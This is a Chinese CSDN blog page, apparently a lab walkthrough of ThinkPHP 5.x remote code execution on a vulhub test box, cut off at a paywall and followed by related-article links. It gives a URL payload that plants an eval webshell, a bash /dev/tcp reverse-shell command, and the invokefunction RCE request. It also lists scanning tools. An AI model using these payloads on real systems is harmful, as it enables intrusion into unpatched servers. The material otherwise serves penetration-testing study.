ThinkPHP漏洞合集(专注渗透视角)_thinkphp v6

最新推荐文章于 2024-10-03 19:13:53 发布
最新推荐文章于 2024-10-03 19:13:53 发布
阅读量3.2k 收藏 41
点赞数 43
CC 4.0 BY-SA版权
分类专栏: 技术交流https://aa.icnn.cn/ygmRR7 文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gan_zi_ge/article/details/142024230

%7B@phpinfo()%7D]( )%7D)

传后门
  1. 上传后门
http://192.168.229.140:8080/index.php?s=a/b/c/${@print(eval($\_POST[1]))}

image.png

  1. 简单测试一下,两种方式都行

image.png
image.png

  1. 连接webshell

image.png

反弹shell

方式1:攻击者编写反弹shell的命令:bash -i >& /dev/tcp/192.168.229.1/9999 0>&1
然后开启一个web服务,让受害者下载并执行,获取shell
image.png
方式2:直接通过后门执行反弹shell的命令
image.png

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞

漏洞介绍 & 环境准备

**漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5中,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。
环境搭建:

cd vulhub-master/thinkphp/5-rce
docker-compose up -d
docker ps

image.png

漏洞发现

TideFinger✅

项目介绍:https://mp.weixin.qq.com/s/ruZlZtEUC09xfy327kFG4g
下载地址:关注“Tide安全团队”公众号,回复指纹即可

./TideFinger_Linux -u http://192.168.229.140:8080/ -pd

image.png

afrog✅

项目地址:https://github.com/zan8in/afrog
image.png

nuclei✅
nuclei -tags thinkphp -u http://192.168.229.140:8080/

image.png

xray✅

image.png

thinkphp_scan✅

项目地址:https://github.com/anx0ing/thinkphp_scan
image.png

ThinkphpRCE✅

项目地址:https://github.com/sukabuliet/ThinkphpRCE
image.png

蓝鲸✅

项目地址:https://github.com/bewhale/thinkphp_gui_tools
image.png
image.png

莲花✅

项目地址:https://github.com/Lotus6/ThinkphpGUI
image.png
尝试命令执行,未得到结果

Thinkphp全网GUI圈子社区专版✅

image.png

漏洞验证 & 利用

直接访问如下地址,即可执行phpinfo:
http://192.168.229.140:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

最低0.47元/天 解锁文章

200万优质内容无限畅学
ThinkPHP漏洞合集专注渗透视角
LainWith的博客
04-11 1万+
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
thinkphp6.x 反序列化漏洞
weixin_61785633的博客
07-09 1356
thinkphp5.x的反序列化还在贴图片,md文件不能直接沾上来难受,而这个遇到个奇怪的问题,一个代码开始能运行,过段时间居然报错了,不得不说计算机挺玄学的。
thinkphp6漏洞
最新发布
小发猫
10-03 605
ThinkPHP 是一个为了简化企业级应用开发和敏捷Web应用开发而诞生的PHP框架。它基于MVC(Model-View-Controller)模式,提供了强大的功能支持以及灵活的扩展机制。随着版本的迭代,ThinkPHP6带来了更多新的特性和改进,但也伴随着安全性的考量。本文将介绍ThinkPHP6中可能遇到的一些漏洞类型,并提供相应的防范措施。在开始讨论如何防范之前,我们首先需要了解什么是ThinkPHP6中的漏洞
Thinkphp6 反序列化漏洞分析
无问社区的博客
08-22 2054
小编对Thinkphp6 反序列化漏洞的分析和自己的总结,全篇有点长,可以互相交流一下
thinkphp漏洞总结
热门推荐
scu_hacker博客
01-19 1万+
目录 前言 一、远程代码执行漏洞 1.1 影响范围 1.2 漏洞详情 二、5.x远程命令注入 三、5.1.x SQL注入 前言 thinkphp是一个国内轻量级的开发框架,采用php+apache,在更新迭代中,thinkphp也经常爆出各种漏洞thinkphp一般有thinkphp2、thinkphp3、thinkphp5、thinkphp6版本,前两个版本已经停止更新,主要介绍下thinkphp5的漏洞 一、远程代码执行漏洞 1.1 影响范围 thinkphp&l...
thinkphp6文件写入漏洞
01-08
网络安全
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2614
Thinkphp6.0.x反序列化漏洞复现
ThinkPHP漏洞合集专注渗透视角)_thinkphp v6,40道网络安全面试
m0_60721823的博客
04-06 1371
*漏洞原理:**ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(
thinkphp漏洞利用工具-thinkphp_gui_tools(),附下载链接。
白帽子黑客SuperherRo
09-23 755
ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
PHP漏洞全解(详细介绍)
10-27
针对PHP的网站主要存在下面几种攻击方式,这里介绍下,大家在书写php代码的时候一定要注意下
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
ThinkPHP_v5.0.7.zip_ThinkPHP V5.0.7_thinkphp
09-23
《深入理解ThinkPHP V5.0.7框架》 ThinkPHP,作为一个广受开发者欢迎的开源PHP框架,其V5.0.7版本是其发展过程中一个重要里程碑。这个版本不仅继承了ThinkPHP一贯的轻量级和面向对象设计原则,还引入了诸多新特性和...
Thinkphp漏洞
weixin_43873557的博客
02-06 1147
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin
ThinkPHP漏洞总结
文公子的博客
11-03 2913
ThinkPHP漏洞总结 ThinkPHP 是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。 0x00前言 本篇文章将针对ThinkPHP的历史漏洞进行整理复现,今后爆出的ThinkPHP漏洞,也将进行补充更新。 0x01ThinkPHP远程命令执行/代码执行漏洞 一,ThinkPHP
ThinkPHP v6.0.x反序列化漏洞复现与分析
m0_61083409的博客
06-18 2242
初始环境,需要注意的是,新版v6基于开发 使用进行安装 坑点,截止到 ,默认核心安装的为 但是到最后面部分代码段已经修复了利用点,所以为了避免大家再次踩坑,请部署完成后,请前往 中,修改核心依赖相关版本,回退更新 进行回退更新,没有出现报错即成功 开启web服务进行验证访问’ 注意:实际测试需要PHP版本>7.2.5**** 版本安装后默认使用单应用模式部署,url访问受到路由模式的影响,为了使用方便,我们先要去 中将 访问控制器中的方法名,并且传递参数值 需要编写一个控制器模块并存在反序列化可控点,这样
PHP函数漏洞集合
Assassin
07-16 4814
1.弱类型比较 2.MD5 compare漏洞 PHP在处理哈希字符串时,如果利用”!=”或”==”来对哈希值进行比较,它把每一个以”0x”开头的哈希值都解释为科学计数法0的多少次方(为0),所以如果两个不同的密码经过哈希以后,其哈希值都是以”0e”开头的,那么php将会认为他们相同。 常见的payload有 0x01 md5(str) QNKCDZO 240
ThinkPHP 系列漏洞_thinkphp漏洞,网络安全开发面试准备
m0_61330806的博客
04-08 1094
??????5.0.x :?s=index/think\config/get&name=database.username # 获取配置信息?s=index/\think\Lang/load&file=…/…/test.jpg # 包含任意文件?s=index/\think\Config/load&file=…/…/t.php # 包含任意.php文件?
thinkPHP漏洞检测工具Tp_Attack_GUI使用指南
资源摘要信息: "ThinkPHP漏洞检测" ThinkPHP是一个流行的PHP开发框架,它广泛应用于Web开发领域。由于其普及程度高,ThinkPHP框架的应用程序可能会成为黑客攻击的目标。漏洞检测是保证Web应用程序安全的关键步骤之...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值